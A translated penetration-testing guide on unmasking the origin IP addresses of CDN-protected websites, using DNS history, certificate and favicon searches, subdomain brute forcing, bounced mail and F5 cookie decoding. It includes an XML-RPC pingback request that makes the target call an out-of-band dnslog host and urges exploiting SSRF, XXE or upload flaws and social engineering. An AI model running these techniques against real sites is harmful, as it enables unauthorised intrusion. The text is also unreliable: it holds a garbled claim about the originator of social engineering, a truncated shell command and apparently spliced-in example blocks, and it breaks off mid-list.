CDN 2021 Full Attack Guide (1)

This is the most complete, detailed, up-to-date and practical article on attacking CDN-protected networks available anywhere (domestic or foreign). If you run into CDN problems during a penetration test, this guide is all you need to read. I will also keep this article updated on GitHub (https://github.com/bin-maker/2021CDN/) for a long time, adding and revising new bypass techniques, tools and websites.
Content Delivery Network (sometimes translated as content distribution network) is abbreviated CDN.
CDN technology effectively improves both the access speed and the security of websites. As a result, more than 50% of Alexa's top 1,000 sites and more than 35% of Alexa's top 10,000 sites are deployed behind CDNs: every user requesting site content receives the cached copy from the nearest CDN proxy server, so content loads faster and site performance improves.
The principles behind CDNs are well described elsewhere on the Internet; interested readers can study them on their own. This guide is about attacking CDNs and aims to be simple, efficient and practical, so it does not repeat conceptual material.

0x01 Common CDN service providers
1. Domestic CDN service providers
Alibaba Cloud CDN
Baidu Cloud CDN
Qiniu Cloud CDN
Upyun CDN
Tencent Cloud CDN
UCloud
360 CDN
Wangsu (ChinaNetCenter)
ChinaCache
Dilian Technology
2. CDN service providers abroad
CloudFlare
StackPath
Fastly
Akamai
CloudFront
Edgecast
CDNetworks
Google Cloud CDN
CacheFly
KeyCDN
UDomain
CDN77
 
0x02 Determine whether a website uses a CDN
Look up the domain's IP address and check whether a large number of unrelated domain names resolve to it.
Check whether the response headers carry a CDN provider's identifying header.
Use a multi-location ping service ("super ping") to ping from different locations and check whether the returned IP addresses differ.
Check whether the IP address falls inside a known CDN provider's address ranges.
If an ASP or ASP.NET site reports a Server header of Nginx rather than IIS, it is most likely behind an Nginx reverse proxy.
Query the domain with nslookup and check whether multiple answer IP addresses are returned.
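The header, address-range and multiple-A-record checks listed above, as an added Python example that is not part of the original guide. The vendor header signatures and the CIDR ranges are constructed placeholders (a real check must load each provider's published range list), and the two sample hosts with their headers and resolved addresses are made up for the demo so that it runs offline.

```python
"""Heuristic CDN detection, as an added example (not from the original guide).

Applies three of the checks listed above to offline input:
  1. a CDN vendor's identifying response header,
  2. resolved addresses inside a provider's address ranges,
  3. more than one distinct A record.
The vendor signatures and CIDR ranges here are constructed placeholders;
a real check must load each provider's published range list.
"""
import ipaddress

# (header name, substring that must appear, vendor). An empty substring
# means the mere presence of the header is the signal. Constructed list.
CDN_HEADER_SIGNATURES = [
    ("server", "cloudflare", "CloudFlare"),
    ("cf-ray", "", "CloudFlare"),
    ("server", "akamaighost", "Akamai"),
    ("x-cache", "cloudfront", "CloudFront"),
    ("x-served-by", "cache-", "Fastly"),
]

# Placeholder ranges taken from the RFC 5737 documentation prefixes,
# NOT the providers' real address space.
CDN_IP_RANGES = {
    "CloudFlare": ["203.0.113.0/24"],
    "Akamai": ["198.51.100.0/24"],
}


def match_headers(headers):
    """Return the set of vendors whose header signature appears in `headers`."""
    lowered = {k.lower(): v.lower() for k, v in headers.items()}
    found = set()
    for name, needle, vendor in CDN_HEADER_SIGNATURES:
        if name in lowered and needle in lowered[name]:
            found.add(vendor)
    return found


def match_ip_ranges(ips, ranges=CDN_IP_RANGES):
    """Return the set of vendors whose ranges contain any of the resolved IPs."""
    found = set()
    for ip in ips:
        addr = ipaddress.ip_address(ip)
        for vendor, cidrs in ranges.items():
            if any(addr in ipaddress.ip_network(cidr) for cidr in cidrs):
                found.add(vendor)
    return found


def assess(headers, resolved_ips, ranges=CDN_IP_RANGES):
    """Combine the checks into a verdict for one hostname."""
    vendors = match_headers(headers) | match_ip_ranges(resolved_ips, ranges)
    multiple_a = len(set(resolved_ips)) > 1
    return {
        "cdn_likely": bool(vendors) or multiple_a,
        "vendors": sorted(vendors),
        "multiple_a_records": multiple_a,
    }


# Constructed sample observations (response headers plus the A records an
# nslookup would return) for two hypothetical hosts.
SAMPLES = {
    "shop.example.com": ({"Server": "cloudflare", "CF-RAY": "5f1c-SJC"},
                         ["203.0.113.10", "203.0.113.11"]),
    "intranet.example.com": ({"Server": "nginx/1.18.0"}, ["192.0.2.7"]),
}

if __name__ == "__main__":
    for host, (headers, ips) in SAMPLES.items():
        print(host, assess(headers, ips))
```

Run from the inside, over your own DNS zone, the same heuristics show which hosts are supposed to be fronted by the CDN but in fact resolve straight to the origin; a single A record outside the provider's ranges on a name that should be protected is the case worth following up.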
 
0x03 How to bypass the CDN and trace the website's real IP address
1. Query DNS records, IP history and subdomains
Many websites put only the key or primary domain names behind the CDN, and many subdomains do not use the CDN at all. You can therefore query the root domain, second-level, third-level and even deeper subdomains to obtain real IP addresses. Sometimes the real IP is still not found and only an A record is present; in that case, continue by scanning the IP addresses and ports of the same C-class (/24) range and check one by one whether a host is the target site.
Before the website adopted the CDN, its domain resolved directly to the real IP address, so you can query DNS history to see whether the pre-CDN IP address can be recovered.
Among DNS records, pay particular attention to TXT and SPF records, which often leak real IP addresses.
1. Online query platforms
1. SecurityTrails (https://securitytrails.com/)
SecurityTrails (formerly DNS Trails) holds roughly 3.5 trillion DNS records, 300 million WHOIS records, 800 million SSL certificate records and more than 450 million subdomains. The site has been collecting and updating large amounts of data daily since 2008.
SecurityTrails is one of my most frequently used platforms: it is free, accurate, and its data volume is more than enough for daily use.
DNS records:


IP history:


Subdomain name:


2. Complete DNS (https://completedns.com/)
Complete DNS holds more than 2.2 billion DNS change records and provides an API that can query multiple domain names and IP addresses at once.


3. WhoISrequest (https://whoisrequest.com/)
WhoISrequest has tracked and recorded historical DNS changes since 2002, so its data is plentiful.


The timeline-style UI is not particularly striking, but I like it.
4. Whoxy (https://www.whoxy.com/)
Whoxy has crawled data for more than 365 million subdomains. Its API is convenient to call and returns data in XML and JSON formats.


5. ThreatBook (https://x.threatbook.cn/)
ThreatBook lets you query threat intelligence, history, subdomain resolution, DNS resolution and other information by IP address or domain name.


6. Netcraft (https://netcraft.com/)
Netcraft needs no introduction; many people know it, though opinions about it differ. Times have changed and Netcraft is no longer what it once was, so I list it here for reference only.


7. ViewDNS (https://viewdns.info/)
ViewDNS is very concise and intuitive: even with little English you can understand it, or at least see where to type. It responds quickly, the home page is clear at a glance, and it integrates a large number of query functions.


Pick out the function you need, or use the API the site provides.


8. WhoisXML API (https://reverse-ip.whoisxmlapi.com/)
The WhoisXML API database contains more than 140 million domain-ecosystem records used for reverse IP and reverse DNS lookups, which is very useful for cross-checking when bypassing a CDN. Like Whoxy, it returns data in XML and JSON formats and supports customization.

 


9. DNSDB (https://dnsdb.io/)
DNSDB is a very powerful platform and another one I use regularly.
Before searching, it is worth learning the search syntax:


Find it difficult? Don't want to learn it? No problem: the site's maintainer has thought of lazy users and put a search builder on the home page, which is very friendly:

 


10. SubDomainTools (https://ruo.me/sub)
This online subdomain query supports a real-time mode and a background mode, does not block the front-end thread or hog the CPU, and is very convenient for small tests.


2. IoT and cyberspace search engines
1. Censys (https://censys.io/)
Censys helps security practitioners discover Internet-reachable devices, including IP addresses, open ports, physical locations, domain information, hosting providers, SSL certificates and other data; with it you can find the information you need and trace a website's real IP address.


2. FOFA (https://fofa.so/)
FOFA quickly matches website assets and speeds up follow-up work such as vulnerability impact analysis, application distribution statistics and application popularity ranking. FOFA is very friendly: even the free tier returns plenty of data, so unless you are a commercial or heavy user there is no need to buy a membership.

 


3. Shodan (https://www.shodan.io/)
Shodan is often called the most powerful search engine on the Internet. It is mainly used to search for online devices in cyberspace: you can search for specific devices or device types, which helps security researchers find useful information about their targets.
Its syntax is very powerful; we recommend browsing the filter documentation before searching so you get twice the result for half the effort.


4. ZoomEye
As is well known, Shodan focuses on host devices, while ZoomEye focuses on web discovery.


3. Tools and scripts
1. subDomainsBrute
Project address: https://github.com/lijiejie/subDomainsBrute
subDomainsBrute finds subdomains by pure DNS brute forcing. To maximise efficiency it uses coroutines plus multiple processes. Python 3.5 and later need the aiodns library for asynchronous queries; Python 2 needs the dnspython library and the gevent coroutine library.
Previously it could not scan domains with wildcard DNS. In an October update the author added wildcard DNS support, enabled with the -w parameter.
As shown in the figure below, brute forcing a wildcard DNS domain with subDomainsBrute first reports an any-sub error; the -w parameter then forces wildcard DNS brute forcing:


2. ESD
Project address: https://github.com/FeeiCN/ESD
Compared with brute-force collection methods, ESD takes a distinctive approach in several areas:
It enumerates wildcard DNS domains using RSC (response similarity comparison).
Using aiohttp, it fetches the response of a subdomain that does not exist and compares its similarity with the response of each dictionary subdomain. If the similarity exceeds the threshold, the subdomain serves the same page as the wildcard; otherwise the subdomain is available, and the similarity of the final subdomain's response is compared once more.
It enumerates domain names with AsyncIO asynchronous coroutines.
AsyncIO + aiodns is 50% faster than the traditional multi-process / multi-thread / gevent approach.
It solves the problem of DNS providers not determining the egress network line.
It handles the inconsistent cache times of different DNS providers.
It solves random DNS issues.
Invalid DNS addresses are automatically removed according to network conditions, improving the enumeration success rate.
ESD filters out wildcard resolution using text similarity and a threshold. The method now seems rather heavy: it requires a powerful machine, can overload memory and CPU, and does not support Python 2. We can modify the script ourselves to address this.
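The response similarity comparison that ESD describes, as an added Python example that is not ESD's own code. It learns the wildcard catch-all page by fetching a random name that cannot exist, then scores each candidate subdomain against that baseline with difflib's ratio and a threshold. The domain example.com, the three pages, the threshold value and the simulated fetch function are all constructed so the script runs offline.

```python
"""Response similarity comparison (RSC) for wildcard DNS, as ESD describes it.

Added example, not ESD's own code. A name that cannot exist is fetched to
learn the wildcard catch-all page; each candidate subdomain's page is then
scored against that baseline with difflib, and anything above the
threshold is treated as the same catch-all page rather than a real host.
The domain example.com, the pages and the fetch function are constructed
so that the script runs offline.
"""
import difflib
import secrets

SIMILARITY_THRESHOLD = 0.9   # constructed value; ESD uses its own threshold

# Constructed pages: what the hypothetical example.com wildcard returns for
# any unknown name, plus two names that have their own content.
PAGES = {
    "__wildcard__": "<html><body><h1>Welcome</h1><p>This domain is parked.</p></body></html>",
    "mail.example.com": "<html><body><h1>Webmail</h1><form action='/login'><input name='user'></form></body></html>",
    # Same catch-all page with a trivial difference: must still count as wildcard.
    "www.example.com": "<html><body><h1>Welcome</h1><p>This domain is parked.</p><!-- v2 --></body></html>",
}


def fetch(host):
    """Simulated HTTP GET (stands in for ESD's aiohttp fetch)."""
    return PAGES.get(host, PAGES["__wildcard__"])


def similarity(a, b):
    """0.0 .. 1.0 ratio of matching characters between two response bodies."""
    return difflib.SequenceMatcher(None, a, b).ratio()


def wildcard_baseline(domain):
    """Fetch a random name that cannot exist to learn the catch-all response."""
    probe = f"{secrets.token_hex(8)}.{domain}"
    return fetch(probe)


def classify(domain, candidates, threshold=SIMILARITY_THRESHOLD):
    """Map each candidate to 'wildcard' (same page as the catch-all) or 'distinct'."""
    baseline = wildcard_baseline(domain)
    verdict = {}
    for host in candidates:
        score = similarity(baseline, fetch(host))
        verdict[host] = "wildcard" if score >= threshold else "distinct"
    return verdict


if __name__ == "__main__":
    names = ["mail.example.com", "www.example.com", "shop.example.com"]
    for host, label in classify("example.com", names).items():
        print(f"{host:20} {label}")
```

The threshold is what makes the method heavy: every candidate costs an HTTP fetch plus a full-text diff, which is why ESD needs a capable machine. From the defender's side the same comparison, run against your own zone, shows whether a wildcard record is quietly exposing a forgotten host whose page differs from the catch-all.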
Install directly with pip (Python 3):

$ pip install esd

Basic usage (from the project's own documentation):

# Scan a single domain name
esd -d qq.com
# Scan a single domain name in debug mode
esd=debug esd -d qq.com
# Scan multiple domain names, separated by commas (,)
esd --domain qq.com,tencent.com
# Scan a single domain name and filter out subdomains whose response contains a specific string
esd --domain mogujie.com --filter "search our store"
# Scan a single domain name and filter out subdomains whose response contains any of several strings
esd --domain mogujie.com --filter "search our store,favorite store"
# Scan the domains listed in a file (one domain name per line)
esd --file targets.txt
# Skip similarity comparison (with this option, wildcard DNS domains are all filtered out)
esd --domain qq.com --skip-rsc
# Use search engines to find subdomains (baidu, google, bing and yahoo are supported, separated by commas)
esd --domain qq.com --engines baidu,google,bing,yahoo
# Split the dictionary evenly to speed up brute forcing
esd --domain qq.com --split 1/4
# Use a DNS zone transfer vulnerability to obtain subdomains
esd --domain qq.com --dns-transfer
# Use HTTPS certificate transparency to obtain subdomains
esd --domain qq.com --ca-info

But looking at the source code, we find that many of these functions were never implemented by the author:

parser = OptionParser('Usage: python ESD.py -d feei.cn -F response_filter -e baidu,google,bing,yahoo -p user:pass@host:port')
parser.add_option('-d', '--domain', dest='domains', help='The domains that you want to enumerate')
parser.add_option('-f', '--file', dest='input', help='Import domains from this file')
parser.add_option('-F', '--filter', dest='filter', help='Response filter')
parser.add_option('-s', '--skip-rsc', dest='skiprsc', help='Skip response similary compare', action='store_true', default=False)
parser.add_option('-S', '--split', dest='split', help='Split the dict into several parts', default='1/1')
parser.add_option('-p', '--proxy', dest='proxy', help='Use socks5 proxy to access Google and Yahoo')
parser.add_option('-m', '--multi-resolve', dest='multiresolve', help='Use TXT, AAAA, MX, SOA record to find subdomains', action='store_true', default=False)
parser.add_option('--skey', '--shodan-key', dest='shodankey', help='Define the api of shodan')
parser.add_option('--fkey', '--fofa-key', dest='fofakey', help='Define the key of fofa')
parser.add_option('--femail', '--fofa-email', dest='fofaemail', help='The email of your fofa account')
parser.add_option('--zusername', '--zoomeye-username', dest='zoomeyeusername', help='The username of your zoomeye account')
parser.add_option('--zpassword', '--zoomeye-password', dest='zoomeyepassword', help='The password of your zoomeye account')
parser.add_option('--cuid', '--censys-uid', dest='censysuid', help="The uid of your censys account")
parser.add_option('--csecret', '--censys-secret', dest='censyssecret', help='The secret of your censys account')
(options, args) = parser.parse_args()

It is easy to see that HTTPS certificate transparency, DNS zone transfer and several other functions are not implemented.
ESD currently supports only Linux, which is fixed by its source code; however, we can modify it ourselves to support Windows.


As you can see, in the engine.py script the output directory is hard-coded to /tmp/esd; to use it on Windows, you only need to replace it with a Windows output directory:

# write output
tmp_dir = 'C:\\temp'   # Windows output directory (was /tmp/esd in the original engine.py)
if not os.path.isdir(tmp_dir):
    os.mkdir(tmp_dir, 0o777)
output_path_with_time = '{td}/.{domain}_{time}.esd'.format(td=tmp_dir, domain=self.domain, time=datetime.datetime.now().strftime("%Y-%m_%d_%H-%M"))
output_path = '{td}/.{domain}.esd'.format(td=tmp_dir, domain=self.domain)
if len(self.data):
    max_domain_len = max(map(len, self.data)) + 2
else:
    max_domain_len = 2
output_format = '%-{0}s%-s\n'.format(max_domain_len)
with open(output_path_with_time, 'w') as opt, open(output_path, 'w') as op:
    for domain, ips in self.data.items():
        # The format is kept consistent with other scanners so that they can
        # be invoked together without extra parsing cost
        if ips is None or len(ips) == 0:
            ips_split = ''
        else:
            ips_split = ','.join(ips)
        con = output_format % (domain, ips_split)
        op.write(con)
        opt.write(con)

3. Layer Subdomain Miner
Project address: https://hub.fastgit.org/euphrat1ca/LayerDomainFinder/releases/tag/3
Seay's work has been around for a long time; it is a very powerful Windows GUI tool that has gone through several iterations. The official latest version is 5.0, and countless modified versions by netizens circulate in the wild.


4. Xray
Project address: https://github.com/chaitin/xray
xray is a powerful security assessment tool and automated scanner. We can use its built-in subdomain discovery function for targeted detection:


The subdomain feature supports both brute-force and non-brute-force modes; you can restrict detection to web services, or to subdomains that resolve to an IP address. It also supports delivering results via webhook, which is very convenient when using it as a plug-in or as a receiver for distributed messages.


5. bypass-firewalls-by-DNS-history
Project address: https://github.com/vincentcox/bypass-firewalls-by-DNS-history
bypass-firewalls-by-DNS-history is a fully automated tool that looks up DNS history, searches for old A records, collects subdomains and checks whether the server still responds for the domain name. It then compares the HTML responses of the candidate origin server and the firewall against a similarity threshold.
Usage:

bash bypass-firewalls-by-DNS-history.sh -d example.com
-d --domain: domain to bypass
-o --outputfile: output file with IP's
-l --listsubdomains: list with subdomains for extra coverage
-a --checkall: Check all subdomains for a WAF bypass


In addition, similar tools such as subfinder and dnsprobe exist; interested readers can study their working principles and mechanisms on their own.
2. Through email
Generally, if a large website's mail server sends email to external users without any processing or protection of the headers, the email header source contains the real IP address of the mail server. Common email trigger points:
RSS subscription
Email registration and activation
Password retrieval email
Product update email push
Email notification sent after a service runs
Forgotten-password flows on the employee mailbox portal, mail management platform, etc.


There is also a clever trick: send an email to a non-existent address such as 000xxx@domain.com. Because the user does not exist, delivery fails, and the bounce notification you receive contains the real IP address of the mail server that handled it.
Pay attention to these points in practice. If one fails, move on to the next email trigger point; many large websites have more than one mail server, and not all of them are protected. Details decide success or failure.
3. SSL certificates
Certificate Authorities (CAs) must publish every SSL/TLS certificate they issue to public logs. SSL/TLS certificates usually contain domain names, subdomains and email addresses, so they can be used to discover the real IP address of the target site.
When a CDN provider protects a server, it also communicates with the origin over TLS. The origin therefore serves its certificate on port 443 whenever the domain is requested there, and we can locate the website's real IP address by comparing certificates.


1. Use the Censys engine (https://censys.io/)
The Censys search engine scans the entire Internet, sweeping the IPv4 address space every day to find networked devices and collect information about them. It can be used to search SSL certificates across the Internet and find the real IP address.
As you can see, when we search for an Internet IP address, the certificate's SHA-1 fingerprint is shown for matching:


Similarly, we search for the SSL certificate fingerprint by domain name and then look up the IP address.
First select the Certificates search; the results contain a mix of valid and invalid certificates:


During testing it is easy to fall into the trap of assuming that the valid certificate is the one we need, but that is not necessarily so: many misconfigured servers still keep invalid ones. In this example, because there are many results, I use Censys syntax to narrow the search to valid SSL certificates:

parsed.names: xxx.com and tags.raw: trusted

The number of results instantly drops to two. Click each one, then use the SHA-1 fingerprint to look up IPv4 hosts:


Unfortunately, neither of the two records turns up a host:


This also shows, indirectly, that a website's IP server is not always matched only by a valid certificate.
So we go back to the beginning, open each result in turn, check the fingerprints, and finally locate the real IP address:


Security is not only a technical job; it is also a job for the careful.
2. Use the command line
Common basic commands such as openssl and curl can also be used to check an SSL certificate in reverse.
openssl (stdin is redirected so s_client exits after printing the certificate):

openssl s_client -connect 123.123.123.123:443 </dev/null 2>/dev/null | grep subject

curl (-k is needed because the certificate will not match the bare IP, and -v writes the certificate details to stderr, hence 2>&1):

curl -kv https://123.123.123.123 2>&1 | grep 'subject'

3. Use tools and scripts
By writing your own script that combines points 1 and 2 above, you can implement a simple SSL certificate crawler. You can also use existing scripts, tools and websites, which saves effort.
For example CloudFlair, project address: https://github.com/christophetd/CloudFlair
The script is compatible with Python 2.7 and 3.5 and needs a Censys API configured. However, it can only check targets that use the CloudFlare service.
Register a Censys account and open https://censys.io/account/api to obtain the API ID and Secret:


Clone CloudFlair locally and export the API ID and Secret as environment variables:

$ git clone https://github.com/christophetd/CloudFlair
$ export CENSYS_API_ID="xxx"
$ export CENSYS_API_SECRET="xxx"

Install the dependencies from requirements.txt:

$ pip install -r requirements.txt

Run cloudflair.py:

$ python cloudflair.py --censys-api-id xxx --censys-api-secret xxx baidu.com
[*] The target appears to be behind CloudFlare.
[*] Looking for certificates matching "myvulnerable.site" using Censys
[*] 75 certificates matching "myvulnerable.site" found.
[*] Looking for IPv4 hosts presenting these certificates...
[*] 10 IPv4 hosts presenting a certificate issued to "myvulnerable.site" were found.
  - 51.194.77.1
  - 223.172.21.75
  - 18.136.111.24
  - 127.200.220.231
  - 177.67.208.72
  - 137.67.239.174
  - 182.102.141.194
  - 8.154.231.164
  - 37.184.84.44
  - 78.25.205.83
[*] Retrieving target homepage at https://myvulnerable.site
[*] Testing candidate origin servers
  - 51.194.77.1
  - 223.172.21.75
  - 18.136.111.24 responded with an unexpected HTTP status code 404
  - 127.200.220.231 timed out after 3 seconds
  - 177.67.208.72
  - 137.67.239.174
  - 182.102.141.194
  - 8.154.231.164
  - 37.184.84.44
  - 78.25.205.83
[*] Found 2 likely origin servers of myvulnerable.site!
  - 177.67.208.72 (HTML content identical to myvulnerable.site)
  - 182.102.141.194 (HTML content identical to myvulnerable.site)

In fact, you can use the Censys API to put together a simple, practical, fully automated detection script. If I have time to write it later, it will be updated here as well.
4. Certificate collection
Use https://crt.sh for fast certificate queries and collection.

 


A Python script for the query:

import re
import requests

TIME_OUT = 60

def get_SSL(domain):
    """Return the subdomains of `domain` found in crt.sh certificate entries."""
    domains = []
    url = 'https://crt.sh/?q=%25.{}'.format(domain)   # %25 is the URL-encoded '%' wildcard
    response = requests.get(url, timeout=TIME_OUT)
    # crt.sh lists each name in its own <TD> cell; capture the label before ".<domain>"
    ssl = re.findall(r"<TD>(.*?)\.{}</TD>".format(re.escape(domain)), response.text)
    for name in ssl:
        name += '.' + domain
        domains.append(name)
    print(domains)
    return domains

if __name__ == '__main__':
    get_SSL("baidu.com")

This obtains all subdomains that appear in certificates:


4. Query through overseas DNS
For websites serving the domestic market, most CDN providers do not deploy the CDN for overseas regions. Therefore, you can query niche, less popular overseas DNS resolvers to see whether a real IP address comes back:

$ nslookup target.com <overseas DNS address>

You can also use an overseas multi-location ping platform to test from many countries and regions online. I recommend https://www.host-tracker.com/v3/check/, which supports ping tests from more than 140 regions, long-term monitoring of a subdomain, and email notifications; it is extremely powerful.

 


5. Leakage through sensitive files
Including but not limited to:
Server log files
Probe files, such as phpinfo
Website backup archives
.DS_Store
.hg
.git
SVN
web.xml
The dictionary is very important. These files are often overlooked on an edge server.
6. Changed domain names
Many websites change their domain name over the course of their development. For example, JD.com's previous domain was 360buy.com; it later spent a huge sum to acquire jd.com.
When a website moves to a new domain name, the CDN is deployed for the new domain, but if the old domain has not expired it may still resolve without the CDN, so you can obtain the server IP address directly. Historical domain names are therefore also important.
7. Through mobile apps
If the website has an app, you can capture and analyse the app's traffic to see whether the website's real IP address can be found. Remember to look at historical versions of the app; they are often full of surprises.
8. Decode F5 LTM cookies
LTM distributes all application requests across multiple node servers; this load balancing improves the processing capacity of the service.
When the server uses F5 LTM for load balancing, the real IP address of the server can be obtained by decoding the Set-Cookie value.
Example:

Set-Cookie: BIGipServerpool_9.29_5229=605532106.22012.0000

First take the decimal number in the first field, 605532106.
Convert it to hexadecimal: 2417afca.
Then read the four bytes from back to front: CA AF 17 24.
Finally convert each byte to decimal: 202.175.23.36, which is the real IP address of the server.
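The four decoding steps above, as an added Python example that is not part of the original guide. It parses the Set-Cookie line quoted in the text and reverses the little-endian encoding with struct and socket, returning the intermediate hex and byte values so each step can be checked. Decoding the second (port) field with the same byte swap is an addition the text does not spell out; the cookie value itself is the one from the example above.

```python
"""Decode an F5 BIG-IP persistence cookie (added example, not from the guide).

Follows the four steps described above: take the first decimal field,
write it in hex, read its four bytes back to front, and print each byte
in decimal. The cookie below is the one quoted in the text; decoding the
second (port) field the same way is an addition the text does not spell out.
"""
import re
import socket
import struct

# BIGipServer<pool>=<ip-as-decimal>.<port-as-decimal>.0000
COOKIE_RE = re.compile(r"^(BIGipServer\S+?)=(\d+)\.(\d+)\.(\d+)$")

SAMPLE = "Set-Cookie: BIGipServerpool_9.29_5229=605532106.22012.0000"


def decode_ip_field(ip_field):
    """Return the intermediate steps and the result for the 32-bit IP field."""
    value = int(ip_field)
    hex_str = f"{value:08x}"                    # step 2: 605532106 -> "2417afca"
    reversed_bytes = struct.pack("<I", value)   # step 3: little-endian -> CA AF 17 24
    return {
        "hex": hex_str,
        "bytes": [f"{b:02X}" for b in reversed_bytes],
        "ip": socket.inet_ntoa(reversed_bytes),   # step 4: 202.175.23.36
    }


def decode_port_field(port_field):
    """The 16-bit port field is little-endian as well: swap its two bytes."""
    return struct.unpack(">H", struct.pack("<H", int(port_field)))[0]


def decode_bigip_cookie(line):
    """Parse a Set-Cookie line or bare cookie value.

    Returns None when the value is not a plain-text BIGipServer cookie
    (absent, or an encrypted/IPv6 form this decoder does not handle).
    """
    value = line.strip()
    if value.lower().startswith("set-cookie:"):
        value = value.split(":", 1)[1].strip()
    match = COOKIE_RE.match(value)
    if not match:
        return None
    name, ip_field, port_field, _ = match.groups()
    return {
        "pool": name[len("BIGipServer"):],
        "ip": decode_ip_field(ip_field)["ip"],
        "port": decode_port_field(port_field),
    }


if __name__ == "__main__":
    print(decode_ip_field("605532106"))
    print(decode_bigip_cookie(SAMPLE))
```

The same function doubles as a check to run over your own responses: if it returns anything other than None for a production host, the pool member's address is visible to every client. On the BIG-IP side, the cookie encryption option of the cookie persistence profile prevents the value from being decoded this way.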
9. Use CDN header feature values
Many websites, after enabling the CDN, are configured to deny direct access to the real IP address. For example, CloudFlare shows this prompt:


Therefore you can narrow the range by matching the feature header. In this example you can query Censys:

Syntax: <port>.http.get.headers.server:<CDN feature>
eg: 80.http.get.headers.server:cloudflare

The Internet-wide search results are then matched further, for example by port, geographic location, banner characteristics, reverse email lookup, contact information and so on, to keep refining the results:

 


10. Through XML-RPC pingback
XML-RPC is a standard that supports communication between WordPress and other systems. It standardises those exchanges by using HTTP as the transport and XML as the encoding.
In early WordPress versions XML-RPC was disabled by default, but from version 3.5 onwards it is enabled by default.
XML-RPC supports trackback and pingback.
Although WordPress has moved to the REST API in place of XML-RPC, XML-RPC is not obsolete and can be used with confidence. Old as the technology is, it still works against many websites.
After setting up a DNSLog, send a POST request to XML-RPC:

POST /xmlrpc.php HTTP/1.1
Host: domain.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 323

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://2vbis4.dnslog.cn</string></value>
</param>
<param>
<value><string>https://domain.com/</string></value>
</param>
</params>
</methodCall>

Response:


Refresh the DNSLog to obtain the server's real IP address:


11. Use FTP/SCP
In many cases a website needs to move data from outside to internal servers; the safest way is to set up a VPN between users and servers.
In practice, however, a large number of FTP / SCP services are still reachable from outside, which makes it easy to find the source IP address.
12. Use the WebSocket protocol
CDN providers such as CloudFlare already support protecting WebSocket traffic, but many webmasters, of large and small sites alike, either do not know this or have not deployed it.
Another reason is business requirements: WebSocket needs a persistent connection between client and server, so a CDN is often not deployed for it.
13. Through social engineering
Kellen King, an outstanding early-21st-century thinker, philosopher, sociologist and economist, was the originator of social engineering. He called himself a bracket.
Some may laugh, but do not underestimate the power of social engineering. Many large companies and operators have fallen to it: phishing email, watering-hole attacks, physical social engineering, identity impersonation, customer-service fraud, business consulting and so on. There are countless cases.
Because people are not machines, and wherever there are people there are vulnerabilities.
Oh, and by the way, I recommend the film "Catch Me If You Can" starring Leonardo DiCaprio.
14. Website vulnerabilities
If the target website has vulnerabilities such as SSRF, XXE, XSS, file upload or command execution, or any other foothold we have found, inject the address of our own out-of-band server and then check the HTTP logs on that server.
Application errors, triggered by passing wrong parameter values or wrong addresses, cause internal exceptions and the familiar error pages. Pay attention to these error points; they often disclose real IP addresses or internal CIDR blocks.
15. Scan the whole Internet
What year is it? Why are we still talking about scanning the whole Internet? For completeness I mention it here.
Obtain the IP address ranges of the target region from the APNIC Network Information Centre or IPdeny.
Then use tools such as Zmap and masscan to grab the banners of hosts with open ports.
Then write the subdomain we are looking for into the Host field of the HTTP request.
Finally, filter on the features to check whether a matching server responds.
Oh, by the way, if the port is uncommon or not fixed, give up on the spot.
In fact, whole-Internet scanning is very cumbersome and is not recommended. Many websites already provide Internet-wide crawling services, as the earlier methods showed, so why scan the whole Internet yourself? Limited by your network and your equipment, can your personal crawl ever be as complete as theirs?
16. Virtual-host collision
Once we have collected enough candidate real IP addresses for the target, we can collide the IP addresses with the subdomains to find out which subdomains each IP serves.
The IP address is correct and the subdomain is incorrect:


Correct IP address and correct subdomain:


The IP address is invalid. The subdomain is correct:


The virtual-host-discovery tool automates this. Project address: https://github.com/jobertabma/virtual-host-discovery
Clone it locally:

$ git clone https://github.com/jobertabma/virtual-host-discovery

Usage:

$ ruby scan.rb --ip=x.x.x.x --host=domain --wordlist=<dict file>

The --wordlist parameter can be omitted; a default dictionary is loaded. It specifies the list of subdomains we want to try.
After execution, you can quickly find the subdomains that hit the IP address.


In addition, you can use the find-virtual-hosts tool (https://pentest-tools.com/information-gathering/find-virtual-hosts#) to quickly scan and compare data online, with results like the following:


17. Hash features through favicon.ico
favicon.ico is a small icon displayed on the left side of the webpage title in modern browsers.
The icon data is usually fromhttps://anywebsite/favicon.icoThe browser will automatically request it when browsing any website.
This is because the fingerprint hash of favicon.ico can be calculated, and the same host results can be searched by search engines such as shodan to further detect whether the real IP address of the target website can be dug out.
Small script for calculating favicon.ico hash:
python 2

Plain Text

Copy code

import mmh3
import requests
response = requests.get('https://domain.com/favicon.ico')
favicon = response.content.encode('base64')
hash = mmh3.hash(favicon)
print hash

python 3

Plain Text

Copy code

import mmh3
import requests
import codecs
response = requests.get('https://domain.com/favicon.ico')
favicon = codecs.encode(response.content,"base64")
hash = mmh3.hash(favicon)
print(hash)

After the environment dependency is installed, run the script to calculate the favicon.ico hash value of the target website:

Plain Text

Copy code

$apt-get install build-essential
$apt-get install gcc
$apt-get install g++
$python 3.py


Then use the shodan search engine to search for the hash to hit the IP address:

Plain Text

Copy code

$proxychains shodan search http.favicon.hash:1730752770 --fields ip_str,port --separator "" | awk '{print $1 ":


It is also worth mentioning that, during a penetration test, fingerprints can be sorted and categorized by favicon hash, subdomain, and IP hits. In addition, a fingerprint hash table of common middleware or components can be built so that assets can be hit quickly by category:



18. Through webpage source code characteristic values
If the server's source IP address allows access and returns similar website content, you can pick out a series of static features in the page source such as JS, CSS, and HTML, and then use search engines such as Shodan, ZoomEye and Censys to perform matching searches that locate the IP address.
For example, a Google Analytics JS feature is found in the source code:


Then search Shodan for these code features:

http.html:UA-XXXXX-X
http.html:GTM-XXXXXX

Find the server source IP address:


19. Through remote resource services on the website
Find business sites of the target that support passive connections such as remote images and files, supply a resource file hosted on your own server, and then check the HTTP log to locate the connection made by the target server.
For example, loading a remote avatar.
20. Through the CDN machines
